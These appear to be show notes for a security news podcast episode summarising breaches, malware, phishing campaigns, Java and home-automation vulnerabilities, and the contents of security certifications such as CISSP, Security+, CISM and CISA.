Downloads

In Security Decoded this week we cover the news and there is a lot of it:

Hacker announces the Zombie Apocalypse is here over the Emergency Broadcast System* Facebook had a Zero Day* Multiple US Government agencies we hacked* Zeus is showing up in Japan* Your heating and elevator controls could be easily hacked* A new RAT called Frutas* More Java, Flash, PDF and Microsoft vulnerabilities announced* The PCI Special Intrest Group releases guidance around Cloud Computing* And much more news. And we talk in details about security certifications.

Hacked Emergency broadcast announces Zombie Apocalypse is here

Viewers in Montana who were no doubt already on the edge of their seats waiting for the results of "teen cheaters take lie detectors" were suddenly confronted with a bigger calamity on Monday. The CW station of KRTV was interrupted by an emergency alert for a zombie apocalypse. Viewers were told that "the bodies of the dead are rising from their graves and attacking the living" in several Montana counties. KRTV confirmed someone had hacked into their emergency alert system and "there is no emergency."

Fed says internal site breached by hackers, no critical functions affected - Anonymous attack on US Government

Energy Department networks hit by Sophisticated Cyber Attack

There are indications the attackers had other motives, possibly including plans to gain future access to classified and other sensitive information.

No classified information was compromised in the cyber attack

The source or identity of the cyber attacker is not known, according to U.S. officials and outside security analysts. However, Chinese hackers are likely suspects because the department is known to be a major target of China for both secrets and technology.

The relative sophistication of the cyber attack is an indication of nation-state involvement.

A total of 14 computer servers and 20 workstations at the headquarters were penetrated during the attack.

At least 20 internal documents, including confidential items, may have been stolen from the Foreign Ministry via an official computer in an apparent cyber-attack, it has been learned.

The ministry said Tuesday it had examined only one computer so far, and it would examine other computers to determine whether they were not infected with malware.

The cyber-attack followed the recent revelation at the Agriculture, Forestry and Fisheries Ministry that more than 3,000 pieces of information, including highly confidential documents, are suspected to have been stolen via unauthorized access to its computers.

According to the Foreign Ministry, it was notified by the National Information Security Center (NISC) on Jan. 28 that a computer at the ministry had possibly been the victim of unauthorized access. The ministry conducted an investigation and verified one of its computers had unauthorized communications with an external server.

The documents believed stolen include conference materials that could be considered class-2 information in terms of confidentiality according to the government's standard classification.

Nokia Taiwan web sites defaced

Hackers of the Turkish Ajan group have breached Nokia Taiwan’s official website (nokia.com.tw). They defaced four subdomains andleaked files that, according to the hackers, contain around 100,000 records, including user details.

The affected subdomains are member.nokia.com.tw, event.nokia.com.tw, fun.nokia.com.tw, and swipe.nokia.com.tw.

It’s difficult to determine precisely how many users are affected by the breach. However, the Nokia610_Users file contains the names, email addresses,phone numbers, and IMEIs of 440 customers.

One of the larger files, NKA073_User, contains the details of close to 20,000 users. The names,mobile phone numbers and email addresses of over 25,000 customers are stored in another file named Event_N97_User.

Python and Debian wiki’s hacked

An analysis of the incident revealed that an exploit had been planted on our servers possibly as early as July 25 2012, which allowed arbitrary execution of code under the user running theMoinMoin wiki.

It is likely that the password information was downloaded from the server in the course of the security breach, so we recommend changing your passwords immediately, if you have used the same password for other services as well.

Exploit was used on Engineer’s laptop (the undisclosed software was then made aware of the zero-day used by Facebook in their test)

Did not sound the test alarm until the team was underway

everything was a test to see how they handled a security situation

Use this quote, it is a good reference to Episode 1 in our predictions where we state CyberSecurity is falling behind and needs to close the gap, "Internet security is so flawed," Facebook Chief Security Officer Joe Sullivan told Ars. "I hate to say it, but it seems everyone is in this constant losing battle if you read the headlines. We don't want to be part of those bad headlines.

BKDR_Zaccess - known as a bootkit malware other this has the ability to download other malware or push fake applications like FakeAV

TROJ_Ransom - Known as Ransomeware, typically locks systems until users are force to pay a sum of money . This malware is rapidy active in the wld and evolving at a fast pace We have seen this in the form of “FBI” notifications of illegal web activity.

Whitehole is still in a Beta Testing mode but developers are currently seeling the kit ranging from 200-1800 USD

Yahoo using old Java

At a time when JAVA has come under the microscope for it’s multiple vulnerabilities and companies like Apple and Mozilla urges users to update to the most current version of JAVA, YAHOO is still offering an application based on a 2008 version of JAVA

Sitebuilder - is a free tool that is designed to make building a website as simple as point and click. Sitebuild requires JAVA to function.

Yahoo bunbles this application with Java 6 Update 7. It has not been cleared if this is an oversite or if SiteBuilder can function with recent versions of JAVA

Latest Java 6 is release 39

One final note about SiteBuilder: Building your site with this tool may not only be hazardous to the security of your PC, it may also make it harder for your site to get the recognition it deserves. A bit of searching on this tool turned up some less than flattering resultssuggesting that sites built with SiteBuilder do not support an important type of Web site search optimization called “canonicalization.”

Money Transfer Spam Campaign with HTML Attachment

Phishers love to arouse curiosity and/or fear in the user’s mind and this stimulus can compel people to set aside all caution as well as any safety measures they might have in place

users are advised to confirm a pending transaction with their bank and also told that there is a copy of a bank slip attached

If the HTML attachment is opened, users are shown an image of a payment order. It is interesting to note that this image is very faint and very difficult to read. Using the HTML tag HTTP-EQUIV "REFRESH", this image disappears after four seconds. This display of the receipt for a small time period is an attempt to arouse enough interest in the user so that they will venture further into the trap.

The page refreshes after four seconds and a popup appears that states that the user has been signed out of their email account and needs to sign in again to view the bank slip.

On clicking the only optional button, users are shown a website that resembles a well-known bank login page. If users input their bank credentials or their email address on this page, their information is sent to the scammers and may be used for nefarious purposes.

Phishing: The Easy Way to Compromise Twitter Accounts

If the link is clicked, the browser is directed to a page that informs the user that they need to sign-in to their account to proceed. The page looks like it belongs to Twitter but it is actually a phishing page hosted on a server prepared by the attacker.

No matter what is entered into the login fields, correct or incorrect credentials, the user will appear back in their session.

Looks just like twitter

However, another fake page informs the user that the page they were attempting to visit does not exist. The page then redirects back to the legitimate Twitter page and the user is unaware of anything malicious having taken place.

in the last two years, more than eight million computers have been attacked by Bamital

Affects Search

Microsoft and Symantec teaming up

Microsoft convinced a judge at the U.S. District Court for the Eastern District of Virginia to give it control over the infrastructure that Bamital used to coordinate the search hijacking activities of host PCs

Public cloud environments are usually designed to allow access from anywhere on the Internet.

Perimeter boundaries between client environments can be fluid.

Clients may have limited or no oversight or control over cardholder data storage. Organizations might not know where cardholder data is physically stored, or the location(s) can regularly change. For redundancy or high availability reasons, data could be stored in multiple locations at any given time.

It can be challenging to verify who has access to cardholder data processed, transmitted, or stored in the cloud environment.

Dark Side of Home Automation

X10. Because X10 devices use 4-bit ID numbers, it is vulnerable to brute-force attacks. Furthermore, because it can be turned off with just one command, a thief can turn-off an X10-based alarm and infiltrate a victim’s house.

Z-Wave. By using tools readily available on the Internet, an attacker can sniff all traffic that flows in WPAN. With this information, an attacker can monitor a user’s day-to-day activities and gain information on the kind of devices used at home and how these are controlled. More tech-savvy thieves can even execute random commands via WPAN.

ZigBee. Though ZigBee-based devices have a more secured communication, problems still exist in the gateway between WPAN and an IP network. An attacker can bypass ZigBee authentication due to user’s weak password or misconﬁguration, allowing him to access devices like security cameras. With this, an attacker can monitor user’s daily activities and change gateway conﬁguration to connect to a fake Domain Name System (DNS) or proxy server, that may lead to data theft.

Information Security Governance and Risk Management – the identification of an organization’s information assets and the development, documentation and implementation of policies, standards, procedures and guidelines.

Security governance and policy

Information classification/ownership

Contractual agreements and procurement processes

Risk management concepts

Personnel security

Security education, training and awareness

Certification and accreditation

Software Development Security – refers to the controls that are included within systems and applications software and the steps used in their development.

Systems development life cycle (SDLC)

Application environment and security controls

Effectiveness of application security

Cryptography – the principles, means and methods of disguising information to ensure its integrity, confidentiality and authenticity.

Encryption concepts

Digital signatures

Cryptanalytic attacks

Public Key Infrastructure (PKI)

Information hiding alternatives

Security Architecture and Design – contains the concepts, principles, structures and standards used to design, implement, monitor, and secure, operating systems, equipment, networks, applications, and those controls used to enforce various levels of confidentiality, integrity and availability.

Operations Security – used to identify the controls over hardware, media and the operators with access privileges to any of these resources.

Resource protection

Incident response

Attack prevention and response

Patch and vulnerability management

Business Continuity and Disaster Recovery Planning – addresses the preservation of the business in the face of major disruptions to normal business operations.

Business impact analysis

Recovery strategy

Disaster recovery process

Provide training

Legal, Regulations, Investigations and Compliance – addresses computer crime laws and regulations; the investigative measures and techniques which can be used to determine if a crime has been committed and methods to gather evidence.

Legal issues

Investigations

Forensic procedures

Compliance requirements/procedures

Physical (Environmental) Security – addresses the threats, vulnerabilities and countermeasures that can be utilized to physically protect an enterprise’s resources and sensitive information.

Site/facility design considerations

Perimeter security

Internal security

Facilities security

Security+ - CompTIA

Network Security (21% of exam)

Compliance and Operational Security (18%)

Threats and Vulnerabilities (21%)

Application, Data and Host Security (16%)

Access Control and Identity Management (13%)

Cryptography (11%)

Certified Information Security Manager (CISM) - ISACA

Information Security Governance

Information Security Steering Group

Legal and regulatory issues

Information Security Process Improvement

Recovery Time Objectives

Security Metrics

Due Diligence

Security Baselines

Disaster recovery

Collecting and presenting evidence

Cost Benefit Analysis

Privacy and Tax laws

Certified Information Security Auditor (CISA) - ISACA

SACA IS Auditing Standards, Guidelines and Procedures and Code of Professional Ethics

Control objectives and controls related to IS

CoBit controls

Procedures used to store, retrieve, transport, and dispose of confidential information assets